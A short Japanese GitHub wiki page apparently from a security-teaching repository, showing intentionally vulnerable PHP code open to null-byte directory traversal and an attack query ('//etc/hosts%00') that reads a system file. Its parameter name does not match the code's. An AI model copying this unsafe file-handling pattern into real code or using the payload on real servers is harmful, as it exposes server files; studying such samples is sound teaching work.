ディレクトリトラバーサル 07 - yujitounai/helloworld GitHub Wiki

ディレクトリトラバーサル-05

ヌルバイトによるディレクトリトラバーサル

脆弱なソースコード (PHP 5.3.4以前)

<div class="box">
	<form method="get" action="">src
		<input name="src" type="text">
		<input type="submit">
	</form>
</div>
<?php
$src = filter_input(INPUT_GET,"src");
if($src){
    $filename=$src.".jpg";
    $output = file_get_contents($filename);
    echo $output;
}

攻撃方法

?url=//etc/hosts%00

⚠️ **GitHub.com Fallback** ⚠️